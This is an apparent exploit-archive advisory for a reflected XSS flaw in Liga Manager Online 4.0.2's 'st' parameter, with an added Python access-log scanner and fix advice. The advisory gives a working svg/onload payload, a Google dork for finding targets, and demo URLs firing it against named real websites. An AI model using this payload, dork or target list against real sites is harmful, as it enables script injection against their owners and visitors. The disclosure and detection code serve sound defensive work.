Liga Manager Online (LMO) version 4.0.2 suffers from a cross-site scripting vulnerability in the st request parameter.
######################
# Exploit Title : LMO 4.0.2 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.liga-manager-online.de/homepage/
# Google Dork : "LMO 4.0.2" inurl:"st="
# Date: 2016/01/28
# Version = 4.0.2
######################
# PoC: st=[XSS]
# Payload = '>Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
#http://www.wildeligabremen.com/LMO/lmo.php?action=results&file=noname.l98&st=13%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.bb-american-dart.de/lmo/lmo.php?action=results&file=C-Liga.l98&st=14%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.fortuna-futsal.de/lmo2/lmo.php?action=results&file=Niederrheinliga%202015-2016.l98&st=4%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#http://www.uslaval.it/liga/lmo.php?action=results&file=La%20Val.l98&st=3%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&PHPSESSID=83b06c0e762470bcd58c8fac2ce9a19d
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################
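
For defenders running LMO, the following is an added example (not part of the original advisory and not LMO code) that scans web server access logs for requests to lmo.php whose st parameter is not a plain number. It assumes st normally carries a short match-day integer, as the leading digits in the demo URLs suggest; the log lines, hosts and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; client IPs and paths are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [28/Jan/2016:10:00:01 +0000] "GET /lmo/lmo.php?action=results&file=demo.l98&st=13 HTTP/1.1" 200 5120
192.0.2.11 - - [28/Jan/2016:10:00:05 +0000] "GET /lmo/lmo.php?action=results&file=demo.l98&st=13%27%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team HTTP/1.1" 200 5188
192.0.2.12 - - [28/Jan/2016:10:00:09 +0000] "GET /lmo/lmo.php?action=table&file=demo.l98 HTTP/1.1" 200 4096
192.0.2.13 - - [28/Jan/2016:10:00:12 +0000] "GET /lmo/lmo.php?st=4&st=%3Cb%3E HTTP/1.1" 200 4100
192.0.2.14 - - [28/Jan/2016:10:00:15 +0000] "GET /index.php?st=%3Cb%3E HTTP/1.1" 200 100
"""

# Client address and request target from a common/combined log format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: a legitimate st value is a match-day number of 1 to 3 digits.
VALID_ST = re.compile(r"[0-9]{1,3}")


def suspicious_st_requests(log_text):
    """Return (client, decoded_st) for lmo.php requests with a non-numeric st."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/lmo.php"):
            continue  # only the LMO entry point is of interest here
        # parse_qs URL-decodes values and keeps every occurrence of a
        # repeated key, so a benign st followed by a second st is still seen.
        for value in parse_qs(url.query, keep_blank_values=True).get("st", []):
            if not VALID_ST.fullmatch(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_st_requests(SAMPLE_LOG):
        print(f"{client}\tst={value!r}")
```

The same allow-list (digits only) is the natural server-side fix: reject or cast st to an integer before it is used, and HTML-encode it wherever it is echoed into the page.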